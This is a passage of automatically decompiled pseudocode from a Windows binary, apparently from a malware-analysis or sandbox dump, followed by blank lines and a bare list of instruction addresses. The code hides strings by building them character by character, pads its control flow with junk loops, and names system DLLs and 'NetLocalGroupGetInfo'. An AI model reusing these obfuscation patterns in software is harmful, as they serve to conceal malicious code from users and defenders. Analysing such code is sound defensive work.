						 *[fs:eax] = _t5191;
						_t3105 =  *0x8a9f40; // 0x8b0925
						_v157 =  *_t3105;
						__eflags = _v157 + 0x9f - 0x1a;
						if(_v157 + 0x9f - 0x1a < 0) {
							_t1655 =  &_v157;
							 *_t1655 = _v157 - 0x20;
							__eflags =  *_t1655;
						}
						_t3110 =  *0x8aa0b8; // 0x8b0928
						_v158 =  *_t3110;
						__eflags = _v158 + 0x9f - 0x1a;
						if(_v158 + 0x9f - 0x1a < 0) {
							_t1659 =  &_v158;
							 *_t1659 = _v158 - 0x20;
							__eflags =  *_t1659;
						}
						_t3115 =  *0x8a9fcc; // 0x8b0927
						_v159 =  *_t3115;
						__eflags = _v159 + 0x9f - 0x1a;
						if(_v159 + 0x9f - 0x1a < 0) {
							_t1663 =  &_v159;
							 *_t1663 = _v159 - 0x20;
							__eflags =  *_t1663;
						}
						_t3120 =  *0x8a9d20; // 0x8b0920
						_v160 =  *_t3120;
						__eflags = _v160 + 0x9f - 0x1a;
						if(_v160 + 0x9f - 0x1a < 0) {
							_t1667 =  &_v160;
							 *_t1667 = _v160 - 0x20;
							__eflags =  *_t1667;
						}
						_t3125 =  *0x8a9c3c; // 0x8b0918
						_v161 =  *_t3125;
						__eflags = _v161 + 0x9f - 0x1a;
						if(_v161 + 0x9f - 0x1a < 0) {
							_t1671 =  &_v161;
							 *_t1671 = _v161 - 0x20;
							__eflags =  *_t1671;
						}
						_t3130 =  *0x8aa104; // 0x8b0919
						_v162 =  *_t3130;
						__eflags = _v162 + 0x9f - 0x1a;
						if(__eflags < 0) {
							_t1675 =  &_v162;
							 *_t1675 = _v162 - 0x20;
							__eflags =  *_t1675;
						}
						E0040A3C0(0);
						_push(_v2052);
						E0040A3C0(0);
						_push(_v2056);
						E0040A3C0(0);
						_push(_v2060);
						E0040A3C0(0);
						_push(_v2064);
						E0040A3C0(0);
						_push(_v2068);
						E0040A3C0(0);
						_push(_v2072);
						E006BA5A8(7,  &_v2076, __eflags);
						_push(_v2076);
						E0040A494( &_v168, _t3910, 7, _t5187, _t5188);
						_t3151 =  *0x8a9ce4; // 0x8b0912
						_v163 =  *_t3151;
						__eflags = _v163 + 0x9f - 0x1a;
						if(_v163 + 0x9f - 0x1a < 0) {
							_t1700 =  &_v163;
							 *_t1700 = _v163 - 0x20;
							__eflags =  *_t1700;
						}
						_t3156 =  *0x8aa15c; // 0x8b091c
						_v169 =  *_t3156;
						__eflags = _v169 + 0x9f - 0x1a;
						if(_v169 + 0x9f - 0x1a < 0) {
							_t1704 =  &_v169;
							 *_t1704 = _v169 - 0x20;
							__eflags =  *_t1704;
						}
						_t3161 =  *0x8a9f14; // 0x8b0922
						_v170 =  *_t3161;
						__eflags = _v170 + 0x9f - 0x1a;
						if(_v170 + 0x9f - 0x1a < 0) {
							_t1708 =  &_v170;
							 *_t1708 = _v170 - 0x20;
							__eflags =  *_t1708;
						}
						_t3166 =  *0x8a9f14; // 0x8b0922
						_v171 =  *_t3166;
						__eflags = _v171 + 0x9f - 0x1a;
						if(_v171 + 0x9f - 0x1a < 0) {
							_t1712 =  &_v171;
							 *_t1712 = _v171 - 0x20;
							__eflags =  *_t1712;
						}
						_push(_v168);
						E0040A3C0(0);
						_push(_v2084);
						_push(0x86f534);
						E0040A3C0(0);
						_push(_v2088);
						E0040A3C0(0);
						_push(_v2092);
						E0040A3C0(0);
						E0040A494( &_v2080, _t3910, 6, _t5187, _t5188);
						E0040A9E8( &_v20, _v2080, _v2096);
						__eflags = 0;
						_pop(_t4842);
						 *[fs:eax] = _t4842;
						_push(0x862cd2);
						return E00409CBC( &_v168);
					} else {
						while(1) {
							_v64 = _v64 + 1;
							if(_v60 - _v76 < 0x43) {
								break;
							}
							__eflags = _v64 - 9;
							if(_v64 < 9) {
								continue;
							} else {
								goto L200;
							}
							goto L252;
						}
						_v72 = _v36 * _v24;
						_v28 = _v44 + 4;
						E0040A0C0( &_v16, _v16);
						_t3194 =  *0x8a9ffc; // 0x8b091a
						_v136 =  *_t3194;
						if(_v136 + 0x9f - 0x1a < 0) {
							_v136 = _v136 - 0x20;
						}
						_t3199 =  *0x8a9fbc; // 0x8b0929
						_v137 =  *_t3199;
						if(_v137 + 0x9f - 0x1a < 0) {
							_v137 = _v137 - 0x20;
						}
						_t3204 =  *0x8a9ffc; // 0x8b091a
						_v138 =  *_t3204;
						if(_v138 + 0x9f - 0x1a < 0) {
							_v138 = _v138 - 0x20;
						}
						E0040A3C0(0);
						_push(_v1824);
						E0040A3C0(0);
						_push(_v1828);
						E0040A3C0(0);
						_push(_v1832);
						E0040A3C0(0);
						_push(_v1836);
						E0040A3C0(0);
						_push(_v1840);
						E0040A3C0(0);
						_push(_v1844);
						E0040A3C0(0);
						_push(_v1848);
						E0040A3C0(0);
						_push(_v1852);
						E0040A3C0(0);
						_push(_v1856);
						E0040A3C0(0);
						_push(_v1860);
						E0040A3C0(0);
						_push(_v1864);
						E0040A3C0(0);
						_push(_v1868);
						E0040A3C0(0);
						_push(_v1872);
						E0040A3C0(0);
						_push(_v1876);
						E0040A3C0(0);
						E0040A494( &_v1820, _t3910, 0xf, _t5187, _t5188);
						E0040A9E8( &_v16, _v1820, _v1880);
						E0040A0C0( &_v12, _v16);
						_push(_t5190);
						_push(0x8625da);
						_push( *[fs:eax]);
						 *[fs:eax] = _t5191;
						_t3246 =  *0x8aa02c; // 0x8b0926
						_v139 =  *_t3246;
						if(_v139 + 0x9f - 0x1a < 0) {
							_v139 = _v139 - 0x20;
						}
						_t3251 =  *0x8aa080; // 0x8b0916
						_v140 =  *_t3251;
						if(_v140 + 0x9f - 0x1a < 0) {
							_v140 = _v140 - 0x20;
						}
						_t3256 =  *0x8a9fd0; // 0x8b0917
						_v141 =  *_t3256;
						if(_v141 + 0x9f - 0x1a < 0) {
							_t1509 =  &_v141;
							 *_t1509 = _v141 - 0x20;
							_t5349 =  *_t1509;
						}
						E0040A3C0(0);
						_push(_v1884);
						E0040A3C0(0);
						_push(_v1888);
						E0040A3C0(0);
						_push(_v1892);
						E0040A3C0(0);
						_push(_v1896);
						E0040A3C0(0);
						_push(_v1900);
						E006BA5A8(2,  &_v1904, _t5349);
						_push(_v1904);
						E0040A494( &_v148, _t3910, 6, _t5187, _t5188);
						_t3275 =  *0x8a9e00; // 0x8b091d
						_v142 =  *_t3275;
						if(_v142 + 0x9f - 0x1a < 0) {
							_v142 = _v142 - 0x20;
						}
						_t3280 =  *0x8aa080; // 0x8b0916
						_v149 =  *_t3280;
						if(_v149 + 0x9f - 0x1a < 0) {
							_v149 = _v149 - 0x20;
						}
						_t3285 =  *0x8a9fd0; // 0x8b0917
						_v150 =  *_t3285;
						if(_v150 + 0x9f - 0x1a < 0) {
							_t1537 =  &_v150;
							 *_t1537 = _v150 - 0x20;
							_t5355 =  *_t1537;
						}
						_push(_v148);
						E0040A3C0(0);
						_push(_v1912);
						E0040A3C0(0);
						_push(_v1916);
						E0040A3C0(0);
						_push(_v1920);
						E0040A3C0(0);
						_push(_v1924);
						E0040A3C0(0);
						_push(_v1928);
						E0040A3C0(0);
						_push(_v1932);
						E006BA5A8(1,  &_v1936, _t5355);
						E0040A494( &_v1908, _t3910, 8, _t5187, _t5188);
						E0040A9E8( &_v20, _v1908, _v1936);
						_pop(_t4896);
						 *[fs:eax] = _t4896;
						_push(E008625E1);
						return E00409CBC( &_v148);
					}
				}
				L252:
				L1:
				_push(0);
				_push(0);
				_t3911 = _t3911 - 1;
				if(_t3911 != 0) {
					goto L1;
				} else {
					_push(_t3911);
					_push(__ebx);
					_push(__esi);
					_push(__edi);
					_push(_t5190);
					_push(0x86f3c3);
					_push( *[fs:eax]);
					 *[fs:eax] = _t5191;
					_t1874 =  *0x8a99d4; // 0x0
					_v80 = _t1874;
					if(_v80 != 0) {
						_v80 =  *((intOrPtr*)(_v80 - 4));
					}
					if(_v80 != 0x42) {
						E0040A0C0( &_v20, _v20);
					} else {
						if(_v56 <= _v68) {
							E0040A0C0( &_v16, _v12);
							E0040A0C0( &_v12, _v20);
							__eflags = 0;
							E0040ACEC(_v12, 0, 1,  &_v20);
							E0040A0C0( &_v16, _v20);
							E0040A0C0( &_v12, _v20);
							E0040A0C0( &_v16, _v12);
						} else {
							_v64 = _v28 + 0x7a;
							_v72 = _v40 + 0x79;
							_v48 = _v76 * _v24;
							_v44 = _v60 + _v32;
							E0040A0C0( &_v16, _v12);
							_t3865 =  &_v412;
							_t5154 =  *0x8a9e34; // 0x8b091e
							 *((char*)(_t3865 + 1)) =  *_t5154;
							 *_t3865 = 1;
							E0040A324( &_v416,  &_v412);
							_t3868 =  &_v420;
							_t5157 =  *0x8a9f40; // 0x8b0925
							 *((char*)(_t3868 + 1)) =  *_t5157;
							 *_t3868 = 1;
							E0040A34C( &_v416, 2,  &_v420);
							E0040A324( &_v424,  &_v416);
							_t3873 =  &_v420;
							_t5161 =  *0x8aa15c; // 0x8b091c
							 *((char*)(_t3873 + 1)) =  *_t5161;
							 *_t3873 = 1;
							E0040A34C( &_v424, 3,  &_v420);
							E0040A324( &_v432,  &_v424);
							_t3878 =  &_v420;
							_t5165 =  *0x8a9ce4; // 0x8b0912
							 *((char*)(_t3878 + 1)) =  *_t5165;
							 *_t3878 = 1;
							E0040A34C( &_v432, 4,  &_v420);
							E0040A324( &_v440,  &_v432);
							_t3883 =  &_v420;
							_t5169 =  *0x8a9e00; // 0x8b091d
							 *((char*)(_t3883 + 1)) =  *_t5169;
							 *_t3883 = 1;
							E0040A34C( &_v440, 5,  &_v420);
							E0040A324( &_v448,  &_v440);
							E0040A34C( &_v448, 6, 0x86f3d4);
							E0040A324( &_v456,  &_v448);
							_t3892 =  &_v420;
							_t5175 =  *0x8aa15c; // 0x8b091c
							 *((char*)(_t3892 + 1)) =  *_t5175;
							 *_t3892 = 1;
							E0040A34C( &_v456, 7,  &_v420);
							E0040A324( &_v468,  &_v456);
							_t3897 =  &_v420;
							_t5179 =  *0x8a9f14; // 0x8b0922
							 *((char*)(_t3897 + 1)) =  *_t5179;
							 *_t3897 = 1;
							E0040A34C( &_v468, 8,  &_v420);
							E0040A324( &_v480,  &_v468);
							_t3902 =  &_v420;
							_t5183 =  *0x8a9f14; // 0x8b0922
							 *((char*)(_t3902 + 1)) =  *_t5183;
							 *_t3902 = 1;
							E0040A34C( &_v480, 9,  &_v420);
							E0040AA98( &_v480);
						}
						E0040A0C0( &_v12, _v16);
					}
					E0040A0C0( &_v20, _v20);
					E0040A0C0( &_v12, _v16);
					if(_v28 - _v48 != _v60) {
						E0040A0C0( &_v16, _v16);
					} else {
						if(_v76 + _v76 >= _v32 + _v76) {
							E0040A0C0( &_v20, L"api-ms-win-crt-process-l1-1-0.dll");
							E0040A0C0( &_v12, _v12);
							E0040A0C0( &_v12, _v16);
							E0040ACEC(_v20, 2, 1,  &_v20);
							E0040A0C0( &_v12, _v16);
							E0040ACEC(_v20, 2, 1,  &_v16);
						} else {
							E0040A0C0( &_v12, _v20);
							E0040ACEC(_v12, 0, 1,  &_v16);
							_t3776 =  &_v412;
							_t5097 =  *0x8a9ce4; // 0x8b0912
							 *((char*)(_t3776 + 1)) =  *_t5097;
							 *_t3776 = 1;
							E0040A324( &_v416,  &_v412);
							_t3779 =  &_v420;
							_t5100 =  *0x8aa02c; // 0x8b0926
							 *((char*)(_t3779 + 1)) =  *_t5100;
							 *_t3779 = 1;
							E0040A34C( &_v416, 2,  &_v420);
							E0040A324( &_v424,  &_v416);
							_t3784 =  &_v420;
							_t5104 =  *0x8a9ce4; // 0x8b0912
							 *((char*)(_t3784 + 1)) =  *_t5104;
							 *_t3784 = 1;
							E0040A34C( &_v424, 3,  &_v420);
							E0040A324( &_v432,  &_v424);
							_t3789 =  &_v420;
							_t5108 =  *0x8aa0b8; // 0x8b0928
							 *((char*)(_t3789 + 1)) =  *_t5108;
							 *_t3789 = 1;
							E0040A34C( &_v432, 4,  &_v420);
							E0040A324( &_v440,  &_v432);
							_t3794 =  &_v420;
							_t5112 =  *0x8a9f34; // 0x8b0914
							 *((char*)(_t3794 + 1)) =  *_t5112;
							 *_t3794 = 1;
							E0040A34C( &_v440, 5,  &_v420);
							E0040A324( &_v448,  &_v440);
							_t3799 =  &_v420;
							_t5116 =  *0x8a9f40; // 0x8b0925
							 *((char*)(_t3799 + 1)) =  *_t5116;
							 *_t3799 = 1;
							E0040A34C( &_v448, 6,  &_v420);
							E0040A324( &_v456,  &_v448);
							_t3804 =  &_v420;
							_t5120 =  *0x8a9f14; // 0x8b0922
							 *((char*)(_t3804 + 1)) =  *_t5120;
							 *_t3804 = 1;
							E0040A34C( &_v456, 7,  &_v420);
							E0040A324( &_v468,  &_v456);
							_t3809 =  &_v420;
							_t5124 =  *0x8aa288; // 0x8b091b
							 *((char*)(_t3809 + 1)) =  *_t5124;
							 *_t3809 = 1;
							E0040A34C( &_v468, 8,  &_v420);
							E0040A324( &_v480,  &_v468);
							E0040A34C( &_v480, 9, 0x86f3d4);
							E0040A324( &_v492,  &_v480);
							_t3818 =  &_v420;
							_t5130 =  *0x8aa15c; // 0x8b091c
							 *((char*)(_t3818 + 1)) =  *_t5130;
							 *_t3818 = 1;
							E0040A34C( &_v492, 0xa,  &_v420);
							E0040A324( &_v504,  &_v492);
							_t3823 =  &_v420;
							_t5134 =  *0x8a9f14; // 0x8b0922
							 *((char*)(_t3823 + 1)) =  *_t5134;
							 *_t3823 = 1;
							E0040A34C( &_v504, 0xb,  &_v420);
							E0040A324( &_v520,  &_v504);
							_t3828 =  &_v420;
							_t5138 =  *0x8a9f14; // 0x8b0922
							 *((char*)(_t3828 + 1)) =  *_t5138;
							 *_t3828 = 1;
							E0040A34C( &_v520, 0xc,  &_v420);
							E0040AA98( &_v520);
							E0040A0C0( &_v12, _v20);
							E0040A0C0( &_v12, L"wmpshell.dll");
							E0040A0C0( &_v16, L"NetLocalGroupGetInfo");
						}
					}
					E0040A0C0( &_v20, _v16);
					if(_v76 - _v60 < 0xd0) {
						E0040A0C0( &_v20, L"FXSCOM.dll");
					}
				}
				goto L17;
			}
























































































































































































































































































































































































































































































































































































































































































































































































































      0x0085e760
      0x0085e760
      0x0085e760
      0x0085e761
      0x0085e763
      0x0085e763
      0x0085ed8f
      0x0085ed91
      0x0085ed92
      0x0085ed97
      0x0085ed9a
      0x0085eda3
      0x0085eda8
      0x0085edad
      0x0085edba
      0x0085edc5
      0x0085edc9
      0x0085edd2
      0x0085edd8
      0x0085ede3
      0x0085ede6
      0x0085edee
      0x0085edf1
      0x0085edf9
      0x0085ee03
      0x0085ee12
      0x0085ee17
      0x0085ee21
      0x0085ee21
      0x0085ee33
      0x0085ee38
      0x0085ee3d
      0x0085ee44
      0x0085ee4e
      0x0085ee50
      0x0085ee50
      0x0085ee54
      0x0085ee5b
      0x0085ee65
      0x0085ee67
      0x0085ee67
      0x0085ee6b
      0x0085ee72
      0x0085ee7c
      0x0085ee7e
      0x0085ee7e
      0x0085ee82
      0x0085ee89
      0x0085ee93
      0x0085ee95
      0x0085ee95
      0x0085eea7
      0x0085eeac
      0x0085eec5
      0x0085eeca
      0x0085eee3
      0x0085eee8
      0x0085ef01
      0x0085ef06
      0x0085ef1f
      0x0085ef24
      0x0085ef38
      0x0085ef3d
      0x0085ef56
      0x0085ef5b
      0x0085ef74
      0x0085ef79
      0x0085ef92
      0x0085ef97
      0x0085efab
      0x0085efb0
      0x0085efc9
      0x0085efce
      0x0085efe2
      0x0085eff8
      0x0085f006
      0x0085f01a
      0x0085f01f
      0x0085f034
      0x0085f039
      0x0085f04e
      0x0085f053
      0x0085f068
      0x0085f06d
      0x0085f082
      0x0085f087
      0x0085f09c
      0x0085f0a1
      0x0085f0b2
      0x0085f0b7
      0x0085f0c8
      0x0085f0cd
      0x0085f0d3
      0x0085f0e7
      0x0085f0ec
      0x0085f101
      0x0085f106
      0x0085f11b
      0x0085f120
      0x0085f131
      0x0085f142
      0x0085f158
      0x0085f15d
      0x0085f160
      0x0085f166
      0x0085f16b
      0x0085f16e
      0x0085f176
      0x0085f179
      0x0085f180
      0x0085f183
      0x0085f189
      0x0085f18e
      0x0085f191
      0x0085f199
      0x0085f1a0
      0x0085f1a6
      0x0085f1af
      0x0085f1b6
      0x0085f1bd
      0x0085f1bf
      0x0085f1c8
      0x0085f1d3
      0x0085f1d6
      0x0085f1e1
      0x0085f1e6
      0x0085f1ee
      0x0085f1f3
      0x0085f1fb
      0x0085f201
      0x0085f20c
      0x0085f21b
      0x0085f220
      0x0085f226
      0x0085f236
      0x0085f23d
      0x0085f242
      0x0085f24b
      0x0086eb61
      0x0086eb68
      0x0086eb6b
      0x0086eb75
      0x0086eb7a
      0x0086eb7f
      0x0086eb84
      0x0086eb89
      0x0086eb8f
      0x0086eb97
      0x0086eb9a
      0x0086eba2
      0x0086ebad
      0x0086ebb3
      0x0086ebbe
      0x0086ebc1
      0x0086ebc9
      0x0086ebce
      0x0086ebd9
      0x0086ebde
      0x0086ebe3
      0x0086ebe3
      0x0086ebe9
      0x0086ebe9
      0x0086ebf4
      0x0086ec03
      0x0086ec0a
      0x0086ec0f
      0x0086ec23
      0x0086ec2b
      0x0086ec32
      0x0086ec37
      0x0086ec3c
      0x0086ec41
      0x0086ec48
      0x0086ec4b
      0x0086ec60
      0x0086ec65
      0x0086ec68
      0x0086ec6c
      0x0086ec72
      0x0086ec75
      0x0086ec77
      0x0086ec7a
      0x0086ec80
      0x0086ec86
      0x0086ec91
      0x0086ec9c
      0x0086ec9f
      0x0086ecaa
      0x0086ecaf
      0x0086ecba
      0x0086ecbf
      0x0086ecca
      0x0086eccf
      0x0086ecd9
      0x0086ecdf
      0x0086ecea
      0x0086ecef
      0x0086ecf2
      0x0086ecf2
      0x0086ecfe
      0x0086ed03
      0x0086ed7e
      0x0086ed8a
      0x0086ed8f
      0x0086ed99
      0x0086ed9e
      0x0086eda8
      0x0086edad
      0x0086edb5
      0x0086edbb
      0x0086edc6
      0x0086edcb
      0x0086edd0
      0x0086edd0
      0x0086edd3
      0x0086ed05
      0x0086ed05
      0x0086ed0d
      0x0086ed13
      0x0086ed1e
      0x0086ed2d
      0x0086ed32
      0x0086ed3d
      0x0086ed4d
      0x0086ed5d
      0x0086ed62
      0x0086ed6d
      0x0086ed6d
      0x0086edd8
      0x0086ede3
      0x0086ede8
      0x0086edf2
      0x0086edf7
      0x0086edfc
      0x0086ee01
      0x0086ee06
      0x0086ee0c
      0x0086ee12
      0x0086ee1a
      0x0086ee20
      0x0086ee2b
      0x0086ee30
      0x0086ee3a
      0x0086ee3f
      0x0086ee47
      0x0086ee4d
      0x0086ee58
      0x0086ee5d
      0x0086ee65
      0x0086ee6a
      0x0086ee72
      0x0086ee77
      0x0086ee82
      0x0086ee82
      0x0086ee0c
      0x0086ee93
      0x0086ee98
      0x0086ee9d
      0x0086eea7
      0x0086eeac
      0x0086eed0
      0x0086eed8
      0x0086eedd
      0x0086eee2
      0x0086eee7
      0x0086eeec
      0x0086eef2
      0x0086eef4
      0x0086eef9
      0x0086eefe
      0x0086ef03
      0x0086ef08
      0x0086ef13
      0x0086ef18
      0x0086ef20
      0x0086ef25
      0x0086ef2a
      0x0086ef2a
      0x0086ef30
      0x0086ef35
      0x0086ef40
      0x0086ef40
      0x0086eeae
      0x0086eebc
      0x0086eec1
      0x0086eec9
      0x0086eec9
      0x0086ef45
      0x0086ef4b
      0x0086ef53
      0x0086ef56
      0x0086ef65
      0x0086ef6a
      0x0086ef70
      0x0086ef78
      0x0086ef7b
      0x0086ef8c
      0x0086ef9d
      0x0086efa2
      0x0086efa8
      0x0086efb0
      0x0086efb3
      0x0086efc4
      0x0086efd5
      0x0086efe7
      0x0086eff8
      0x0086effd
      0x0086f003
      0x0086f00b
      0x0086f00e
      0x0086f01f
      0x0086f030
      0x0086f035
      0x0086f03b
      0x0086f043
      0x0086f046
      0x0086f057
      0x0086f068
      0x0086f06d
      0x0086f073
      0x0086f07b
      0x0086f07e
      0x0086f08f
      0x0086f09d
      0x0086f0a2
      0x0086f0ac
      0x0086f0b2
      0x0086f0b4
      0x0086f0b4
      0x0086f0be
      0x0086f0be
      0x0086f0c3
      0x0086f0c5
      0x0086f0c8
      0x0086f0cb
      0x0086f0db
      0x0086f0e6
      0x0086f0f6
      0x0086f101
      0x0086f111
      0x0086f121
      0x0086f131
      0x0086f13c
      0x0086f14c
      0x0086f15c
      0x0086f167
      0x0086f177
      0x0086f182
      0x0086f192
      0x0086f1a2
      0x0086f1b2
      0x0086f1c2
      0x0086f1d2
      0x0086f1e2
      0x0086f1f2
      0x0086f202
      0x0086f212
      0x0086f222
      0x0086f232
      0x0086f242
      0x0086f252
      0x0086f262
      0x0086f26d
      0x0086f27d
      0x0086f288
      0x0086f298
      0x0086f2a8
      0x0086f2b8
      0x0086f2c8
      0x0086f2d8
      0x0086f2e8
      0x0086f2f8
      0x0086f308
      0x0086f318
      0x0086f328
      0x0086f338
      0x0086f348
      0x0086f353
      0x0086f363
      0x0086f36e
      0x0086f379
      0x0086f384
      0x0086f38f
      0x0086f39a
      0x0086f3a5
      0x0086f3b0
      0x0086f3c2
      0x0085f251
      0x0085f251
      0x0085f259
      0x0085f263
      0x0085f26f
      0x0085f279
      0x0085f279
      0x0085f284
      0x0085f289
      0x0085f290
      0x0085f292
      0x0085f29e
      0x0085f2a6
      0x0085f2b1
      0x0085f2bc
      0x0085f2d2
      0x0085f2dd
      0x0085f2e8
      0x0085f2e8
      0x0085f29e
      0x0085f2fb
      0x0085f300
      0x0085f307
      0x0085f311
      0x0085f313
      0x0085f313
      0x0085f317
      0x0085f31e
      0x0085f328
      0x0085f32a
      0x0085f32a
      0x0085f32e
      0x0085f335
      0x0085f33f
      0x0085f341
      0x0085f341
      0x0085f345
      0x0085f34c
      0x0085f356
      0x0085f358
      0x0085f358
      0x0085f36a
      0x0085f36f
      0x0085f388
      0x0085f38d
      0x0085f3a6
      0x0085f3ab
      0x0085f3c4
      0x0085f3c9
      0x0085f3e2
      0x0085f3e7
      0x0085f3fb
      0x0085f400
      0x0085f419
      0x0085f41e
      0x0085f437
      0x0085f43c
      0x0085f455
      0x0085f45a
      0x0085f473
      0x0085f478
      0x0085f491
      0x0085f496
      0x0085f4af
      0x0085f4b4
      0x0085f4c8
      0x0085f4cd
      0x0085f4e6
      0x0085f4eb
      0x0085f504
      0x0085f509
      0x0085f522
      0x0085f527
      0x0085f540
      0x0085f545
      0x0085f55e
      0x0085f563
      0x0085f57c
      0x0085f581
      0x0085f595
      0x0085f59a
      0x0085f5ab
      0x0085f5c5
      0x0085f5d0
      0x0085f5dd
      0x0085f5e4
      0x0085f5e7
      0x0085f5f5
      0x0085f5fa
      0x0085f5fd
      0x0085f605
      0x0085f60b
      0x0085f616
      0x0085f61c
      0x0085f627
      0x0085f630
      0x0085f63b
      0x0085f63b
      0x0085f646
      0x0085f64b
      0x0085f64e
      0x0085f662
      0x0085f66d
      0x0085f678
      0x0085f67d
      0x0085f684
      0x0085f68e
      0x0085f690
      0x0085f690
      0x0085f694
      0x0085f69b
      0x0085f6a5
      0x0085f6a7
      0x0085f6a7
      0x0085f6ab
      0x0085f6b2
      0x0085f6bc
      0x0085f6be
      0x0085f6be
      0x0085f6d0
      0x0085f6d5
      0x0085f6ee
      0x0085f6f3
      0x0085f70c
      0x0085f711
      0x0085f72a
      0x0085f72f
      0x0085f748
      0x0085f74d
      0x0085f761
      0x0085f766
      0x0085f77f
      0x0085f784
      0x0085f79d
      0x0085f7a2
      0x0085f7bb
      0x0085f7c0
      0x0085f7d9
      0x0085f7de
      0x0085f7f7
      0x0085f7fc
      0x0085f815
      0x0085f81a
      0x0085f82e
      0x0085f833
      0x0085f84c
      0x0085f851
      0x0085f86a
      0x0085f86f
      0x0085f888
      0x0085f88d
      0x0085f8a6
      0x0085f8ab
      0x0085f8c4
      0x0085f8c9
      0x0085f8e2
      0x0085f8e7
      0x0085f8f8
      0x0085f912
      0x0085f919
      0x0085f91c
      0x0085f91c
      0x0085f923
      0x0085f92d
      0x0085f92f
      0x0085f92f
      0x0085f933
      0x0085f93a
      0x0085f944
      0x0085f946
      0x0085f946
      0x0085f94a
      0x0085f951
      0x0085f95b
      0x0085f95d
      0x0085f95d
      0x0085f96f
      0x0085f974
      0x0085f98d
      0x0085f992
      0x0085f9ab
      0x0085f9b0
      0x0085f9c9
      0x0085f9ce
      0x0085f9e7
      0x0085f9ec
      0x0085fa00
      0x0085fa05
      0x0085fa1e
      0x0085fa23
      0x0085fa3c
      0x0085fa41
      0x0085fa55
      0x0085fa5a
      0x0085fa73
      0x0085fa78
      0x0085fa91
      0x0085fa96
      0x0085faaf
      0x0085fab4
      0x0085facd
      0x0085fad2
      0x0085faeb
      0x0085faf0
      0x0085fb09
      0x0085fb0e
      0x0085fb27
      0x0085fb2c
      0x0085fb32
      0x0085fb4a
      0x0085fb4f
      0x0085fb68
      0x0085fb6d
      0x0085fb86
      0x0085fb9c
      0x0085fbaa
      0x0085fbaf
      0x0085fbb2
      0x0085fbbc
      0x0085fbc6
      0x0085fbcb
      0x0085fbd5
      0x0085fbda
      0x0085fbdf
      0x0085fbe5
      0x0085fbf6
      0x0085fbfb
      0x0085fc00
      0x0085fc05
      0x0085fc0b
      0x0085fc6c
      0x0085fc77
      0x0085fc7c
      0x0085fc87
      0x0085fc8c
      0x0085fc97
      0x0085fca6
      0x0085fcb5
      0x0085fcba
      0x0085fcbf
      0x0085fcbf
      0x0085fcc2
      0x0085fcc8
      0x0085fcd3
      0x0085fc0d
      0x0085fc11
      0x0085fc1a
      0x0085fc1d
      0x0085fc28
      0x0085fc2d
      0x0085fc37
      0x0085fc3c
      0x0085fc44
      0x0085fc4a
      0x0085fc55
      0x0085fc65
      0x0085fc65
      0x0085fcd8
      0x0085fcdd
      0x0085fce7
      0x0085fced
      0x0085fbe7
      0x0085fbee
      0x0085fbee
      0x0085fcf4
      0x0085fcf9
      0x0085fd08
      0x0085fd0d
      0x0085fd17
      0x0085fd25
      0x0085fd38
      0x0085fd3b
      0x0085fd3d
      0x0085fd48
      0x0085fd4d
      0x0085fd57
      0x0085fd5c
      0x0085fd67
      0x0085fd6c
      0x0085fd77
      0x0085fd7c
      0x0085fd86
      0x0085fd8b
      0x0085fd8b
      0x0085fd92
      0x0085fd92
      0x0085fd27
      0x0085fd29
      0x0085fd2e
      0x0085fd2e
      0x0085fd97
      0x0085fd9e
      0x0085fda8
      0x0085fdaa
      0x0085fdaa
      0x0085fdae
      0x0085fdb5
      0x0085fdbf
      0x0085fdc1
      0x0085fdc1
      0x0085fdc5
      0x0085fdcc
      0x0085fdd6
      0x0085fdd8
      0x0085fdd8
      0x0085fdea
      0x0085fdef
      0x0085fe08
      0x0085fe0d
      0x0085fe26
      0x0085fe2b
      0x0085fe44
      0x0085fe49
      0x0085fe62
      0x0085fe67
      0x0085fe7b
      0x0085fe80
      0x0085fe99
      0x0085fe9e
      0x0085feb7
      0x0085febc
      0x0085fed5
      0x0085feda
      0x0085fef3
      0x0085fef8
      0x0085ff11
      0x0085ff16
      0x0085ff2f
      0x0085ff34
      0x0085ff48
      0x0085ff4d
      0x0085ff66
      0x0085ff6b
      0x0085ff84
      0x0085ff89
      0x0085ff9a
      0x0085ffb4
      0x0085ffc1
      0x0085ffc6
      0x0085ffcd
      0x0085ffd3
      0x0085ffdc
      0x0085ffe1
      0x0085ffe4
      0x0085ffec
      0x0085ffef
      0x0085fff7
      0x0085fffd
      0x00860008
      0x0086000d
      0x00860015
      0x0086001b
      0x00860026
      0x0086002b
      0x00860033
      0x00860038
      0x00860043
      0x00860048
      0x00860053
      0x00860058
      0x0086005b
      0x00860061
      0x0086006c
      0x00860071
      0x00860076
      0x0086007b
      0x0086008b
      0x00860096
      0x0086009b
      0x008600a5
      0x008600b2
      0x008600b7
      0x008600be
      0x008600c8
      0x008600ca
      0x008600ca
      0x008600ce
      0x008600d5
      0x008600df
      0x008600e1
      0x008600e1
      0x008600e5
      0x008600ec
      0x008600f6
      0x008600f8
      0x008600f8
      0x0086010a
      0x0086010f
      0x00860128
      0x0086012d
      0x00860146
      0x0086014b
      0x00860164
      0x00860169
      0x00860182
      0x00860187
      0x0086019b
      0x008601a0
      0x008601b9
      0x008601be
      0x008601d7
      0x008601dc
      0x008601f5
      0x008601fa
      0x00860213
      0x00860218
      0x00860231
      0x00860236
      0x0086024a
      0x0086024f
      0x00860268
      0x0086026d
      0x00860286
      0x0086028b
      0x0086029c
      0x008602b6
      0x008602bb
      0x008602c2
      0x008602cc
      0x008602ce
      0x008602ce
      0x008602d2
      0x008602d9
      0x008602e3
      0x008602e5
      0x008602e5
      0x008602f7
      0x008602fc
      0x00860315
      0x0086031a
      0x00860333
      0x00860338
      0x00860351
      0x00860356
      0x0086036f
      0x00860374
      0x00860388
      0x0086038d
      0x008603a6
      0x008603ab
      0x008603c4
      0x008603c9
      0x008603e2
      0x008603e7
      0x00860400
      0x00860405
      0x0086041e
      0x00860423
      0x0086043c
      0x00860441
      0x00860452
      0x0086046c
      0x00860471
      0x00860478
      0x00860482
      0x00860484
      0x00860484
      0x00860488
      0x0086048f
      0x00860499
      0x0086049b
      0x0086049b
      0x0086049f
      0x008604a6
      0x008604b0
      0x008604b2
      0x008604b2
      0x008604c4
      0x008604c9
      0x008604e2
      0x008604e7
      0x00860500
      0x00860505
      0x0086051e
      0x00860523
      0x0086053c
      0x00860541
      0x00860555
      0x0086055a
      0x00860573
      0x00860578
      0x00860591
      0x00860596
      0x008605af
      0x008605b4
      0x008605cd
      0x008605d2
      0x008605eb
      0x008605f0
      0x00860604
      0x00860609
      0x00860622
      0x00860627
      0x00860640
      0x00860645
      0x0086065e
      0x00860663
      0x00860674
      0x0086068e
      0x00860699
      0x008606a2
